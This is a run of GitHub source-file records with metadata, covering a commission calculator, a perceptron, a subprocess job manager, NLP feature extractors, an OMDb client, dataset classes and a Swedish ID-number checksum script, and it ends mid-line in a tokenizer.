amount_spent = self.size * self.buying_price\n minimum = 9.5 # euro\n commission = commission_percentage * amount_spent\n if commission < minimum:\n commission = minimum\n return commission\n\n except Exception as e:\n log.error(f\"There is a problem in the code!: {e}\\n{getDebugInfo()}\")\n\n def commissions_switzerland(self):\n try:\n # This is the commission which is fixed, always the same\n fixed_commission = 5\n # size is supposed to be the number of shares we are buying for the company.\n commission_percentage = 0.0003 # 0.3 per thousand\n amount_spent = self.size * self.buying_price\n minimum = 20 * 0.94 # 20 CHF * exchange rate euro = currency in euro\n commission = commission_percentage * amount_spent\n if commission < minimum:\n commission = minimum\n return commission\n except Exception as e:\n log.error(f\"There is a problem in the code!: {e}\\n{getDebugInfo()}\")\n\n def commissions_others(self):\n try:\n # To define:::\n # This is the commission which is fixed, always the same\n fixed_commission = 20\n # size is supposed to be the number of shares we are buying for the company.\n commission_per_price = 0.0016 # dollars\n # The following is the commission price\n commission = fixed_commission + self.size * self.buying_price * commission_per_price\n return commission\n except Exception as e:\n log.error(f\"There is a problem in the code!: 
{e}\\n{getDebugInfo()}\")\n","repo_name":"marcello-goccia/deep-value-investing","sub_path":"backtesting/homemade_testing/commissions/directa.py","file_name":"directa.py","file_ext":"py","file_size_in_byte":5272,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"18861172603","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 26 23:38:31 2021\n\n@author: marunga\n\"\"\"\n\nimport numpy as np\n\n\"\"\"\n# OPERADOR AND\n#Entradas\nx = np.array([[0,0],[0,1],[1,0],[1,1]])\n#Saídas\ny = np.array([0,0,0,1])\n\"\"\"\n\n\n# OPERADOR OR\n#Entradas\nx = np.array([[0,0],[0,1],[1,0],[1,1]])\n#Saídas\ny = np.array([0,1,1,1])\n\n#Pesos\nw = np.array([0.0,0.0])\n#Taxa de aprendizagem\nlearning = 0.1\n\n#Função de ativação\ndef functionActivation (summation):\n if (summation >=1):\n return 1\n return 0\n\n#Função Somatório\ndef calculateOutput(register):\n #Realiza o produto escalar do par ordedado de entradas com o peso\n result = register.dot(w)\n return functionActivation(result)\n\n#Treinamento, encontra o melhor conjunto de pesos\ndef training ():\n erroTotal = 1\n while (erroTotal != 0):\n erroTotal = 0\n for i in range(len(y)):\n #Calcula a saída \n calculatedOutput = calculateOutput(np.array(x[i]))\n #Calcula a diferença entre a saida esperada e saida calculada\n erro = abs(y[i]- calculatedOutput)\n erroTotal += erro\n #Atualizando Pesos\n for j in range(len(w)):\n #Proximo peso = Peso atual + Taxa de Aprendizado * Entrada Atual * Erro\n w[j] = w[j]+ (learning*x[i][j]*erro)\n print('Peso atualizado: ' + str(w[j]))\n print('Total de Erros: ' +str(erroTotal))\n \ntraining()\nprint('Rede Treinada!')\n#Com a rede treinada, testa se as respostas sairão sem erros\nprint(calculateOutput((x[0])))\nprint(calculateOutput((x[1])))\nprint(calculateOutput((x[2])))\nprint(calculateOutput((x[3])))","repo_name":"livio-lopes/pythonProjects","sub_path":"rna/rna_uma_camada/perceptron_treinamento.py","file_name":"perceptron_treinamento.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"28039059794","text":"import subprocess\nimport threading\nimport time\nfrom datetime import datetime\nimport enum\nimport os\nimport uuid\nfrom collections import Counter\nimport json\nimport contextlib\n\nclass JobRunningStatus(enum.IntEnum):\n Ready = 0\n Running = 1\n Completed = 2\n RetryOut = 3\n\nclass CalledJobError(Exception):\n pass\n\nclass SimpleJobManager:\n def __init__(self, logOutputDirectory:str=\"\") -> None:\n self.lock:threading.Lock = threading.Lock()\n self.allJobRunningStatus:dict = {}\n self.jobs:list = []\n self.logOutputDirecotry:str = logOutputDirectory\n self.jobContexts = None\n\n def detectDuplicatedIds(self, jobContexts:list) -> list:\n return [ key for ( key, value ) in Counter([ context[\"id\"] for context in jobContexts ]).items() if value > 1 ]\n\n def detectCircularReferencedIds(self, jobContexts:list) -> list:\n def traceGraph(id, graph, visited=set()) -> bool:\n visited.add(id)\n\n for neighbor in graph.get(id, []):\n if neighbor in visited or traceGraph(neighbor, graph, visited):\n return True\n\n visited.remove(id)\n return False\n\n graph = { context[\"id\"]: context.get(\"waits\", []) for context in jobContexts }\n return [ id for id in graph.keys() if traceGraph(id, graph) ]\n \n def detectInvalidWaitsIds(self, jobContexts:list) -> list:\n ids = { context[\"id\"] for context in jobContexts }\n 
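# --- Editor's sketch (not part of the dataset records) ---
# An English restatement of the Portuguese-commented perceptron record above:
# train weights for the OR gate with the rule w <- w + lr * x * error, using a
# step activation with threshold 1, looping until an epoch produces zero error.
import numpy as np

X = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])   # inputs
y = np.array([0, 1, 1, 1])                        # OR targets
w = np.zeros(2)                                   # weights
lr = 0.1                                          # learning rate

def predict(x, w):
    return int(x.dot(w) >= 1)       # step activation, threshold 1

total_error = 1
while total_error:
    total_error = 0
    for xi, yi in zip(X, y):
        error = yi - predict(xi, w)
        total_error += abs(error)
        w += lr * xi * error        # perceptron update rule
print(w, [predict(xi, w) for xi in X])
# --- end sketch ---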
waitsIds = { id for context in jobContexts for id in context.get(\"waits\", []) }\n return waitsIds - ids\n \n def detectInvalidIds(self, jobContexts:list) -> list:\n return [ index for index, context in enumerate(jobContexts) if not context.get(\"id\", None) ]\n\n def entryFromJson(self, filename:str):\n with open(filename, \"r\") as f:\n jobContexts = json.load(f)[\"jobContexts\"]\n\n if len([ context for context in jobContexts if context.get(\"semaphore\", None) is not None ]) > 0:\n raise ValueError(\"Key 'semaphore' can not be specified for JSON data read from a file.\")\n\n self.entry(jobContexts)\n\n def entry(self, jobContexts:list) -> None:\n elementIndices = self.detectInvalidIds(jobContexts)\n if len(elementIndices) > 0:\n raise ValueError(f\"Invalid Id detected. element indices={elementIndices}\")\n\n invalidWaitsIds = self.detectInvalidWaitsIds(jobContexts)\n if len(invalidWaitsIds) > 0:\n raise ValueError(f\"Invalid waits. ids.={invalidWaitsIds}\")\n\n dupKeys = self.detectDuplicatedIds(jobContexts)\n if len(dupKeys) > 0:\n raise ValueError(f\"Id duplicated. ids={dupKeys}\")\n\n circularIds = self.detectCircularReferencedIds(jobContexts)\n if len(circularIds) > 0:\n raise ValueError(f\"Circular referenced. ids={circularIds}\")\n\n self.join()\n\n self.lock.acquire()\n self.allJobRunningStatus.clear()\n self.lock.release()\n\n self.jobs.clear()\n for context in jobContexts:\n job = SimpleJob()\n context[\"jobManager\"] = self\n context[\"logOutputDirectory\"] = self.logOutputDirecotry\n job.entry(**context)\n self.jobs.append(job)\n\n self.jobContexts = jobContexts\n\n def rerun(self, interval:float=1.0):\n self.join(interval)\n\n for index, job in enumerate(self.jobs):\n if not job.hasError() and not job.retryOuted():\n continue\n\n job = SimpleJob()\n context = self.jobContexts[index]\n context[\"jobManager\"] = self\n context[\"logOutputDirectory\"] = self.logOutputDirecotry\n job.entry(**context)\n self.jobs[index] = job\n\n self.run(interval)\n\n def runAllReadyJobs(self) -> None:\n [ job.start() for job in self.jobs if job.ready() and not job.ident]\n\n def running(self) -> bool:\n return len([ job for job in self.jobs if job.running() ]) >= 1\n\n def join(self, interval:float=1.0) -> None:\n while self.running():\n time.sleep(interval)\n\n def run(self, interval:float=1.0) -> None:\n while True:\n self.runAllReadyJobs()\n if self.errorOccurred():\n self.join(interval)\n break\n\n if self.completed():\n break\n\n time.sleep(interval)\n\n if self.errorOccurred():\n raise CalledJobError(\"Error occured\")\n\n def completed(self) -> bool:\n return len([ job for job in self.jobs if job.completed() ]) == len(self.jobs)\n\n def errorOccurred(self) -> bool:\n return len([ job for job in self.jobs if job.completed() and job.hasError() ]) >= 1\n\n def report(self) -> dict:\n report = { \"results\": [] }\n for job in self.jobs:\n report[\"results\"].append({ job.id: job.report() })\n\n return json.dumps(report, indent=4)\n\n def getRunningStatus(self):\n return Counter([ job.runningStatus.name for job in self.jobs ])\n\nclass SimpleJob(threading.Thread):\n def entry(self, commandLine:str, id:str=\"\", timeout:int=None, retry:int=1, delay:int=0, backoff:int=1, waits:list=[], semaphore=None, logOutputDirectory:str=\"\", jobManager:SimpleJobManager=None) -> None:\n if not jobManager and len(waits) > 0:\n raise ValueError(\"waits list can set the JobManager together.\")\n\n self.commandLine:str = commandLine\n self.id:str = id if id != \"\" else uuid.uuid4()\n self.waits:list = 
waits\n self.semaphore = semaphore\n self.logOutputDirectory:str = logOutputDirectory\n self.logFileName:str = \"\" if not self.logOutputDirectory else os.path.join(self.logOutputDirectory, f\"{self.id}.log\")\n self.jobManager:SimpleJobManager = jobManager\n self.exitCode:int = 0\n self.runningStatus:JobRunningStatus = JobRunningStatus.Ready\n self.startDateTime:datetime = None\n self.finishDateTime:datetime = None\n self.startTime:float = 0\n self.finishTime:float = 0\n\n # retry parameters\n self.retry:int = retry\n self.timeout:int = timeout\n self.delay:int = delay\n self.backoff:int = backoff\n self.retried:int = 0\n\n @property\n def runningStatus(self) -> JobRunningStatus:\n return self._runningStatus\n\n @runningStatus.setter\n def runningStatus(self, value:JobRunningStatus) -> None:\n self._runningStatus = value\n\n if self.jobManager:\n self.jobManager.lock.acquire()\n self.jobManager.allJobRunningStatus[self.id] = value\n self.jobManager.lock.release()\n\n def hasError(self) -> bool:\n return self.exitCode != 0\n\n def retryOuted(self) -> bool:\n return self.runningStatus == JobRunningStatus.RetryOut\n\n def ready(self) -> bool:\n if self.runningStatus != JobRunningStatus.Ready:\n return False\n\n if not self.waits:\n return True\n \n if self.jobManager:\n self.jobManager.lock.acquire()\n completed = [ job for job in self.jobManager.jobs if job.id in self.waits and job.completed() and not job.hasError() ]\n self.jobManager.lock.release()\n\n return len(completed) == len(self.waits)\n\n def running(self) -> JobRunningStatus:\n return self._runningStatus == JobRunningStatus.Running\n\n def completed(self) -> bool:\n return self._runningStatus in [ JobRunningStatus.Completed, JobRunningStatus.RetryOut ]\n\n def run(self) -> None:\n self.runningStatus = JobRunningStatus.Running\n self.startTime = time.perf_counter()\n self.startDateTime = datetime.now()\n\n for trialCounter in range(0, self.retry + 1):\n try:\n with self.semaphore if self.semaphore is not None else contextlib.nullcontext():\n completePocess = subprocess.run(self.commandLine, capture_output=True, text=True, timeout=self.timeout)\n self.writeLog(completePocess.stdout)\n except subprocess.TimeoutExpired as e:\n self.writeLog(e.output)\n self.writeLog(f\"Error: Timed out({trialCounter}/{self.retry})\")\n\n self.retried = trialCounter\n time.sleep((trialCounter + 1) ** self.backoff + self.delay) # Exponential backoff\n else:\n self.exitCode = completePocess.returncode # latest return code\n self.runningStatus = JobRunningStatus.Completed\n self.finishDateTime = datetime.now()\n self.finishTime = time.perf_counter()\n return\n\n self.exitCode = None\n self.runningStatus = JobRunningStatus.RetryOut\n self.finishDateTime = datetime.now()\n self.finishTime = time.perf_counter()\n\n def writeLog(self, text) -> None:\n if not self.logOutputDirectory:\n return\n\n with open(self.logFileName, \"a\", encoding=\"utf-8\") as f:\n f.writelines(text)\n\n def report(self) -> dict:\n return {\n \"runnigStatus\": self.runningStatus.name,\n \"exitCode\": self.exitCode if self.completed() else None,\n \"retried\": self.retried if self.timeout is not None else None,\n \"commandLine\": self.commandLine,\n \"startDateTime\": self.startDateTime.strftime('%Y/%m/%d %H:%M:%S.%f') if self.startDateTime is not None else None,\n \"finishDateTime\": self.finishDateTime.strftime('%Y/%m/%d %H:%M:%S.%f') if self.finishDateTime is not None else None,\n \"elapsedTime\": self.getElapsedTime()\n }\n\n def getElapsedTime(self) -> str:\n totalMilleSeconds = 
self.finishTime - self.startTime\n if totalMilleSeconds == 0:\n return None\n\n hours = int(totalMilleSeconds / 3600)\n totalMilleSeconds -= hours * 3600\n minutes = int(totalMilleSeconds / 60)\n totalMilleSeconds -= minutes * 60\n seconds = int(totalMilleSeconds)\n totalMilleSeconds -= seconds\n totalMilleSeconds *= 1000000\n\n return f\"{hours:02}:{minutes:02}:{seconds:02}.{int(totalMilleSeconds)}\"\n","repo_name":"Hajime-Saitou/simplejob","sub_path":"simplejob/simplejob.py","file_name":"simplejob.py","file_ext":"py","file_size_in_byte":10169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18101535527","text":"import pkg_resources\nfrom negspacy.negation import Negex # noqa: F401\n\nfrom raiutils.dataset import fetch_dataset\n\nPOSITIVE_NEGATIVE_FILE = 'positive-negative.csv'\n\nresource_package = __name__\nnlp_url = 'https://publictestdatasets.blob.core.windows.net/nlp/'\nfetch_dataset(nlp_url + POSITIVE_NEGATIVE_FILE, POSITIVE_NEGATIVE_FILE)\nmale_words_path = '/'.join(('data', 'male-words.txt'))\nfemale_words_path = '/'.join(('data', 'female-words.txt'))\nneutral_words_path = '/'.join(('data', 'neutral-words.txt'))\nmale_words_data = pkg_resources.resource_string(\n resource_package, male_words_path).decode(\"utf-8\")\nfemale_words_data = pkg_resources.resource_string(\n resource_package, female_words_path).decode(\"utf-8\")\nneutral_words_data = pkg_resources.resource_string(\n resource_package, neutral_words_path).decode(\"utf-8\")\n\nwith open(POSITIVE_NEGATIVE_FILE, 'r', encoding='utf8') as pnf:\n positive_negative_raw = pnf.read()\n\npositive_negative_lines = positive_negative_raw.split(\"\\n\")\n\npositive_words = set()\nnegative_words = set()\nfor line in positive_negative_lines[2:]:\n words = list(map(lambda w: w.strip(), line.split(\",\")))\n if len(words[1]) > 0:\n negative_words.add(words[1])\n\n if len(words[2]) > 0:\n positive_words.add(words[2])\n\nmale_words_raw = male_words_data\nmale_words = set(\n filter(\n lambda w: len(w) > 0,\n map(lambda w: w.strip(), male_words_raw.split(\"\\n\"))))\n\nfemale_words_raw = female_words_data\nfemale_words = set(\n filter(\n lambda w: len(w) > 0,\n map(lambda w: w.strip(), female_words_raw.split(\"\\n\"))))\n\nneutral_words_raw = neutral_words_data\nneutral_words = set(filter(\n lambda w: len(w) > 0,\n map(lambda w: w.strip(), neutral_words_raw.split(\"\\n\"))))\n\n\ndef positive_negative_word_count(nlp_doc):\n positive_count = 0\n negative_count = 0\n for token in nlp_doc:\n if token.lemma_ in positive_words or token.text in positive_words:\n positive_count += 1\n elif token.lemma_ in negative_words or token.text in negative_words:\n negative_count += 1\n\n return {\n \"positive_word_count\": positive_count,\n \"negative_word_count\": negative_count}\n\n\ndef get_named_persons(nlp_doc):\n return list(map(\n lambda tok: tok.text,\n filter(lambda tok: tok.label_ == \"PERSON\", nlp_doc.ents)))\n\n\ndef get_named_locations(nlp_doc):\n return list(map(\n lambda tok: tok.text,\n filter(lambda tok: tok.label_ in [\"LOC\", \"FAC\"], nlp_doc.ents)))\n\n\ndef get_dates(nlp_doc):\n return list(map(\n lambda tok: tok.text,\n filter(lambda tok: tok.label_ == \"DATE\", nlp_doc.ents)))\n\n\ndef get_non_date_numerics(nlp_doc):\n return list(map(\n lambda tok: tok.text,\n filter(\n lambda tok: tok.label_ in [\n \"TIME\", \"PERCENT\", \"MONEY\",\n \"QUANTITY\", \"ORDINAL\", \"CARDINAL\"],\n nlp_doc.ents)))\n\n\ndef get_all_named_entities(nlp_doc):\n return list(map(lambda tok: tok.text, 
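# --- Editor's sketch (not part of the dataset records) ---
# The retry-with-backoff loop from SimpleJob.run in the simplejob record ending
# above, reduced to a standalone function. The sleep schedule mirrors the record:
# (attempt + 1) ** backoff + delay, an exponential backoff; the command is a toy.
import subprocess
import sys
import time

def run_with_retry(cmd, retry=2, timeout=5, delay=0, backoff=1):
    for attempt in range(retry + 1):
        try:
            return subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
        except subprocess.TimeoutExpired:
            if attempt == retry:
                raise                                   # retries exhausted
            time.sleep((attempt + 1) ** backoff + delay)  # exponential backoff

result = run_with_retry([sys.executable, "-c", "print('ok')"])
print(result.returncode, result.stdout.strip())
# --- end sketch ---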
nlp_doc.ents))\n\n\ndef is_noun_phrase(nlp_doc):\n return (len(list(nlp_doc.noun_chunks)) == 1)\n\n\ndef get_dependency_tree_tokens(root_token):\n dependency_tree_tokens = list()\n token_queue = [root_token]\n while len(token_queue) > 0:\n token = token_queue[0]\n dependency_tree_tokens.append(token.text)\n token_queue = token_queue[1:]\n for child in token.children:\n token_queue.append(child)\n\n return dependency_tree_tokens\n\n\ndef is_adjective_phrase(nlp_doc):\n adjectives = list(filter(lambda tok: tok.pos_ == \"ADJ\", nlp_doc))\n for adjective in adjectives:\n dep_tree_tokens = get_dependency_tree_tokens(adjective)\n if len(dep_tree_tokens) == len(nlp_doc):\n return True\n\n return False\n\n\ndef is_verb_phrase(nlp_doc):\n adjectives = list(filter(lambda tok: tok.pos_ == \"VERB\", nlp_doc))\n for adjective in adjectives:\n dep_tree_tokens = get_dependency_tree_tokens(adjective)\n if len(dep_tree_tokens) == len(nlp_doc):\n return True\n\n return False\n\n\ndef get_sub_sentences(sentence):\n sub_sentences = sentence.split(\";\")\n\n return sub_sentences\n\n\ndef detect_sub_sentences_with_different_sentiments(classify_helper, sentence):\n sub_sentences = get_sub_sentences(sentence)\n sentiments = set(classify_helper(sub_sentences))\n\n if len(sentiments) == 1:\n return False\n\n return True\n\n\ndef detect_negation_words_and_entities(nlp_doc):\n negation_tokens = list(filter(lambda tok: tok.dep_ == \"neg\", nlp_doc))\n negated_entities = list(filter(lambda tok: tok._.negex, nlp_doc.ents))\n return {\n \"negation_words\": len(negation_tokens),\n \"negated_entities\": len(negated_entities)}\n\n\ndef dependency_parse_tree_depth(doc):\n # Assumes that we hae one sentence\n sent = next(doc.sents)\n root = sent.root\n depth = 0\n queue = [(root, 0)]\n while len(queue) > 0:\n node, d = queue[0]\n depth = d\n queue = queue[1:]\n for child in node.children:\n queue.append((child, d + 1))\n\n return depth\n","repo_name":"microsoft/responsible-ai-toolbox","sub_path":"nlp_feature_extractors/nlp_feature_extractors/attribute_extractors.py","file_name":"attribute_extractors.py","file_ext":"py","file_size_in_byte":5066,"program_lang":"python","lang":"en","doc_type":"code","stars":1031,"dataset":"github-code","pt":"37"} +{"seq_id":"86573659475","text":"import requests\nimport json\nfrom pprint import pprint\nfrom movie import Movie\nfrom datetime import datetime\nimport locale\nimport os\n\n# locale.setlocale(locale.LC_ALL, 'en_US')\n\nclass Omdb:\n\n def __init__(self, api_key):\n self.api_key = api_key\n\n def omdb_get_by_id(self, id, api_key):\n r = requests.get(f'http://www.omdbapi.com/?i={id}&apikey={api_key}')\n r = r.json()\n if r['Response'] == \"False\":\n movie = f\"Aucun film avec l'id {id} n'existe pas dans la base\"\n return movie\n else:\n imdb_id_str = r['imdbID']\n imdb_id = imdb_id_str.replace(\"tt\", \"\")\n title = r['Title']\n original_title = r['Title']\n\n release_date_class = r['Released']\n if release_date_class == 'N/A':\n release_date_class = None\n release_date = None\n else:\n release_date_strip = release_date_class.strip()\n release_date_object = datetime.strptime(release_date_strip, '%d %b %Y')\n release_date = release_date_object.strftime('%Y-%m-%d')\n\n duration = r['Runtime']\n if duration == 'N/A':\n duration = None\n else:\n duration = duration.split()\n duration = duration[0]\n\n if r['Rated'] == 'R':\n rating = '-12'\n elif r['Rated'] == 'NC-17':\n rating = '-16'\n else:\n rating = 'TP'\n if r['Type']==\"movie\":\n box_office = r['BoxOffice']\n if r['BoxOffice'] == 
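# --- Editor's sketch (not part of the dataset records) ---
# A model-free restatement of positive_negative_word_count from the
# attribute_extractors record ending above: count token hits against sentiment
# lexicons. The word sets here are toy stand-ins; the record loads real lexicons
# from CSV/txt resources and also matches token.lemma_, not just the surface form.
positive_words = {"good", "great", "solid"}
negative_words = {"bad", "broken", "slow"}

def positive_negative_word_count(tokens):
    pos = sum(t in positive_words for t in tokens)
    neg = sum(t in negative_words for t in tokens)
    return {"positive_word_count": pos, "negative_word_count": neg}

print(positive_negative_word_count("a good tool with slow broken parts".split()))
# --- end sketch ---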
'N/A':\n box_office = None\n else:\n box_office = None\n imdb_score = r['imdbRating']\n\n movie = Movie(title, original_title, release_date, duration, rating)\n movie.imdb_id = imdb_id\n movie.imdb_score = imdb_score\n movie.box_office = box_office\n\n return movie\n\n def omdb_get_actors(self, id, api_key):\n r = requests.get(f'http://www.omdbapi.com/?i={id}&apikey={api_key}')\n r = r.json()\n\n actors = r['Actors']\n return actors","repo_name":"Simplon-IA-Bdx-1/the-movie-predictor-thiberged","sub_path":"omdb.py","file_name":"omdb.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70644692267","text":"\nimport numpy as np\nfrom omnilearn.old.data import register_dataset, Batchable, ImageDataset\n\n\n@register_dataset('unpaired-translation')\nclass UnpairedTranslationDataset(ImageDataset):\n\tdef __init__(self, A, dataset1=None, dataset2=None, sel_one=None, swap=None, **kwargs):\n\n\t\tif dataset1 is None:\n\t\t\tdataset1 = A.pull('dataset1')\n\t\tif dataset2 is None:\n\t\t\tdataset2 = A.pull('dataset2')\n\n\t\tif sel_one is None:\n\t\t\tsel_one = A.pull('sel-first', True)\n\n\t\tif swap is None:\n\t\t\tswap = A.pull('swap', False)\n\n\t\tif swap:\n\t\t\tdataset1, dataset2 = dataset2, dataset1\n\n\t\tprint(f'Sizes: {len(dataset1)} vs {len(dataset2)}')\n\n\t\tsuper().__init__(A, din=dataset1.din, dout=dataset2.din, **kwargs)\n\n\t\tself.din1, self.dout1 = dataset1.din, dataset1.dout\n\t\tself.din2, self.dout2 = dataset2.din, dataset2.dout\n\n\t\tself.dataset1 = dataset1\n\t\tself.dataset2 = dataset2\n\n\t\tself.select_first = sel_one\n\n\tdef __len__(self):\n\t\treturn len(self.dataset1) * len(self.dataset2)\n\n\tdef __getitem__(self, item):\n\n\t\tidx1 = item // len(self.dataset2)\n\t\tidx2 = item % len(self.dataset2)\n\n\t\tb1 = self.dataset1[idx1]\n\t\tb2 = self.dataset2[idx2]\n\n\t\tif self.select_first and isinstance(b1, (list, tuple)):\n\t\t\tb1 = b1[0]\n\t\t\tb2 = b2[0]\n\n\t\treturn (b1, b2)\n\n\n@register_dataset('batched-unpaired-translation')\nclass BatchedUnpairedTranslationDataset(Batchable, UnpairedTranslationDataset):\n\n\tdef __getitem__(self, item):\n\n\t\tif isinstance(item, (list, tuple)):\n\t\t\titem = np.array(item)\n\n\t\tidx1 = item // len(self.dataset2)\n\t\tidx2 = item % len(self.dataset2)\n\n\t\tb1 = self.dataset1[idx1]\n\t\tb2 = self.dataset2[idx2]\n\n\t\tif self.select_first and isinstance(b1, (list, tuple)):\n\t\t\tb1 = b1[0]\n\t\t\tb2 = b2[0]\n\n\t\treturn (b1, b2)\n\n\n# @Dataset('unpaired-translation')\n# class UnpairedTranslationDataset(Batchable):\n#\n# \tdef __init__(self, A, dataset1=None, dataset2=None, sel_one=None):\n#\n# \t\tmode = A.pull('mode', 'train')\n#\n# \t\tif dataset1 is None:\n# \t\t\tdataset1 = A.pull('dataset1')\n# \t\t\tif type(dataset1) == dict:\n# \t\t\t\tslice1 = dataset1\n# \t\t\t\tdataset1 = dataset1[mode]\n# \t\t\telse:\n# \t\t\t\tslice1 = {mode: dataset1}\n# \t\telse:\n# \t\t\tslice1 = None\n# \t\tif dataset2 is None:\n# \t\t\tdataset2 = A.pull('dataset2')\n# \t\t\tif type(dataset2) == dict:\n# \t\t\t\tslice2 = dataset2\n# \t\t\t\tdataset2 = dataset2[mode]\n# \t\t\telse:\n# \t\t\t\tslice2 = {mode: dataset2}\n# \t\telse:\n# \t\t\tslice2 = None\n#\n# \t\tif sel_one is None:\n# \t\t\tsel_one = A.pull('sel-first', True)\n#\n# \t\tsuper().__init__(dataset1.din, dataset2.din)\n#\n# \t\tself.mode = mode\n# \t\tself._slice1, self._slice2 = slice1, slice2\n#\n# \t\tself.din1, self.dout1 = dataset1.din, dataset1.dout\n# \t\tself.din2, 
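# --- Editor's sketch (not part of the dataset records) ---
# The release-date normalization from Omdb.omdb_get_by_id in the record ending
# above: OMDb returns dates like "14 Oct 1994"; strptime with '%d %b %Y' parses
# them and strftime re-emits ISO 'YYYY-MM-DD', with the 'N/A' sentinel mapped to
# None. Note %b is locale-dependent (the record even carries a commented-out
# locale.setlocale call); the sample date is illustrative.
from datetime import datetime

def normalize_release_date(raw):
    if raw is None or raw.strip() == "N/A":
        return None
    return datetime.strptime(raw.strip(), "%d %b %Y").strftime("%Y-%m-%d")

print(normalize_release_date("14 Oct 1994"))   # -> 1994-10-14
print(normalize_release_date("N/A"))           # -> None
# --- end sketch ---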
self.dout2 = dataset2.din, dataset2.dout\n#\n# \t\tself.dataset1 = dataset1\n# \t\tself.dataset2 = dataset2\n#\n# \t\tself.select_first = sel_one\n#\n# \tdef __len__(self):\n# \t\treturn len(self.dataset1) * len(self.dataset2)\n#\n# \tdef __getitem__(self, item):\n#\n# \t\tidx1 = item // len(self.dataset2)\n# \t\tidx2 = item % len(self.dataset2)\n#\n# \t\tb1 = self.dataset1[idx1]\n# \t\tb2 = self.dataset2[idx2]\n#\n# \t\tif self.select_first and isinstance(b1, (list, tuple)):\n# \t\t\tb1 = b1[0]\n# \t\t\tb2 = b2[0]\n#\n# \t\treturn (b1, b2)\n#\n# \tdef split(self, A):\n#\n# \t\tsplits = {}\n#\n# \t\tcls = self.__class__\n#\n# \t\tfor key in self._slice1.keys():\n# \t\t\tif key == self.mode:\n# \t\t\t\tsplits[key] = self\n# \t\t\telif self._slice1[key] is not None and self._slice2[key] is not None:\n# \t\t\t\tA.push('mode', key, silent=True)\n# \t\t\t\tsplits[key] = cls(A, dataset1=self._slice1[key], dataset2=self._slice2[key])\n#\n# \t\treturn splits\n","repo_name":"felixludos/omni-learn","sub_path":"omnilearn/old/op/datasets/translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
{"seq_id":"14250787078","text":"# Asks the user for their social security number and splits it into 4 variables yyyy, mm, dd, xxxx.\nyyyy_mm_dd_xxxx = input(\"Skriv ditt personnummer (yyyy-mm-dd-xxxx):\")\nchunks = yyyy_mm_dd_xxxx.split('-')\n\n# - Initializes the boolean \"validity\" to False; the code below shows the ways it can become True.\nvalidity = False\n\n\n# Puts the previous splits together and splits it again letter by letter.\nyyyymmddxxxx = chunks[0] + chunks[1] + chunks[2] + chunks[3]\ndef splitword(word):\n    return [char for char in word]\n\n\n\n# Calculates the first part of the social security number algorithm.\namountlist = list((int(yyyymmddxxxx[2]) * 2, int(yyyymmddxxxx[3]), int(yyyymmddxxxx[4]) * 2, int(yyyymmddxxxx[5]), int(yyyymmddxxxx[6]) * 2, int(yyyymmddxxxx[7]), int(yyyymmddxxxx[8]) * 2, int(yyyymmddxxxx[9]), int(yyyymmddxxxx[10]) * 2))\n\n# Calculates the second part of the social security number algorithm.\n# - Initializes the value of \"x\" to 0.\nx = 0\n# - Iterates over amountlist, splitting any two-digit number into its digits; single digits are left as they are. 
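(E.g. a doubled 7 becomes 14 and contributes 1 + 4 = 5.) 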
It then adds them together into variable \"x\".\nfor i in amountlist:\n    if len(str(i)) == 2:\n        split_dual_number = splitword(str(i))\n        for i in split_dual_number:\n            x = x + int(i)\n    else:\n        x = x + i\n\n# - x is now the sum of all the individual digits inside amountlist; below, that sum is split into its two digits.\nsplit_final_number = (splitword(str(x)))\n\n# - Determines whether the social security number is valid and updates the \"validity\" boolean accordingly.\ndef validity_checker():\n    if (int(split_final_number[1])) == int(yyyymmddxxxx[11]) and (int(split_final_number[1])) == 0:\n        global validity\n        validity = True\n    else:\n        friend_of_10 = 10 - (int(split_final_number[1]))\n        if friend_of_10 == int(yyyymmddxxxx[11]):\n            validity = True\n        else:\n            pass\n\nvalidity_checker()\n\nprint(validity)","repo_name":"Tivamishae/Duran_Project","sub_path":"Test_parts/Part 2: SSN checker algorithm.py","file_name":"Part 2: SSN checker algorithm.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"73917083626","text":"import re\nimport string\nfrom tqdm import tqdm\nimport json\nimport pandas as pd\nfrom collections import defaultdict\nfrom gensim.models import KeyedVectors\nimport gensim\nfrom torch.utils.data import Dataset, DataLoader, WeightedRandomSampler\nimport torch\nimport torch.nn as nn\nfrom collections import Counter\nfrom multiprocessing import Pool\nimport math\nimport gc\nimport gzip\nimport wordninja\n\ndef read_json(file_path):\n    with open(file_path, 'r', encoding='utf-8') as f:\n        file = json.load(f)\n    return file\n\ndef write_json(json_file, file_path):\n    with open(file_path, 'w', encoding='utf-8') as f:\n        json.dump(json_file, f)\n\n\nclass SplitJoinWords():\n    def __init__(self, data_path):\n        with open(data_path, 'r', encoding='utf-8') as f:\n            self.corpus = f.read()\n        self.dictionary = self.build_freq_stats()\n        self.segmenter = wordninja.LanguageModel('conf/freq_stats.txt.gz')\n\n    def words(self, text): \n        return re.findall('[a-zA-Z]+', text)\n    \n    def build_freq_stats(self):\n        freq_stats = Counter(self.words(self.corpus))\n        sorted_keys = sorted(freq_stats, key=lambda k: freq_stats[k], reverse=True)\n        with gzip.open('conf/freq_stats.txt.gz', 'wt', encoding='utf-8') as f:\n            for word in sorted_keys:\n                f.write(word+'\\n')\n        return set(sorted_keys)\n\n    def split(self, word):\n        return self.segmenter.split(word)\n\nclass Tokenizer():\n    def __init__(self, segmenter=None):\n        self.segmenter = segmenter\n        self.pattern = re.compile(r'[\\n\\r\\t]|(\\d)|[\\!\\\"\\#\\$\\%\\&\\\\\\'\\(\\)\\*\\+\\/\\:\\;\\<\\=\\>\\?\\@\\[\\\\\\\\\\]\\^\\`\\{\\|\\}\\~\\,\\。\\?\\!\\:\\、\\《\\》\\ 